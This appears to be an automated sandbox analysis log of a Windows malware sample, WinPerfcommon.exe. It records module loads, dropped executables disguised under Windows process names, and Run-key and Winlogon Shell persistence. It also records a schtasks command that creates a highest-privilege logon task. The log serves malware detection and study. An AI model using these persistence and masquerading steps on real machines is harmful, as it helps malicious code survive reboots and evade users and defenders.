                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: mscoree.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: version.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: wldp.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: profapi.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: sspicli.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: mscoree.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: apphelp.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: version.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: wldp.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: profapi.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: sspicli.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: mscoree.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: version.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: wldp.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: profapi.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\SgrmBroker.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: mscoree.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: apphelp.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: version.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: wldp.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: profapi.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: mscoree.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: version.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: wldp.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: profapi.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Section loaded: sspicli.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: mscoree.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: apphelp.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: version.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: wldp.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: profapi.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: sspicli.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: mscoree.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: version.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: wldp.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: profapi.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\SystemSettings.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: mscoree.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: version.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Directory created: C:\Program Files\Adobe\StartMenuExperienceHost.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Directory created: C:\Program Files\Adobe\55b276f4edf653
Source: WinPerfcommon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: WinPerfcommon.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: WinPerfcommon.exe | Static file information: File size 2020864 > 1048576
Source: WinPerfcommon.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1ece00
Source: WinPerfcommon.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bN.PDB source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.pdb source: WinPerfcommon.exe, 00000000.00000002.1747143226.00000000031DD000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9B800C0D push ebx; retf 0_2_00007FFD9B800C1A
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9B8000AD pushad ; iretd 0_2_00007FFD9B8000C1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9BC15601 pushad ; retf 0_2_00007FFD9BC159CD
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9BC159BC pushad ; retf 0_2_00007FFD9BC159CD
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Code function: 49_2_00007FFD9B7E0C0D push ebx; retf 49_2_00007FFD9B7E0C1A
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Code function: 49_2_00007FFD9B7E00AD pushad ; iretd 49_2_00007FFD9B7E00C1
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Code function: 49_2_00007FFD9BBF5601 pushad ; retf 49_2_00007FFD9BBF59CD
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Code function: 49_2_00007FFD9BBF59BC pushad ; retf 49_2_00007FFD9BBF59CD
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Code function: 50_2_00007FFD9B7C0C0D push ebx; retf 50_2_00007FFD9B7C0C1A
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Code function: 50_2_00007FFD9B7C00AD pushad ; iretd 50_2_00007FFD9B7C00C1
Source: WinPerfcommon.exe | Static PE information: section name: .text entropy: 7.574103435922908
Source: SgrmBroker.exe.0.dr | Static PE information: section name: .text entropy: 7.574103435922908
Source: SystemSettings.exe.0.dr | Static PE information: section name: .text entropy: 7.574103435922908
Source: pzPgKRlGoglDaRzDTBMXwbN.exe.0.dr | Static PE information: section name: .text entropy: 7.574103435922908
Source: pzPgKRlGoglDaRzDTBMXwbN.exe0.0.dr | Static PE information: section name: .text entropy: 7.574103435922908
Source: StartMenuExperienceHost.exe.0.dr | Static PE information: section name: .text entropy: 7.574103435922908

Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File written: C:\Program Files\Adobe\StartMenuExperienceHost.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\yHNOGCAC.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\PipMsYLy.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\GKMojBlr.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\ZQJbcBRg.log
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\iFHJmzLo.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\zsLwvutf.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\GEhWIfwR.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Recovery\SystemSettings.exe
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\fyKARhRs.log
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\EAqnjiFq.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\izcrMdWN.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Recovery\SgrmBroker.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Program Files\Adobe\StartMenuExperienceHost.exe
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\ZWotDWGG.log
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | File created: C:\Users\user\Desktop\PoUdTuAY.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\YLyBcRbf.log
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\zGtWfQBc.log

                              Boot Survival

                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommon
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommon

                              Hooking and other Techniques for Hiding and Protection

                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe    Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
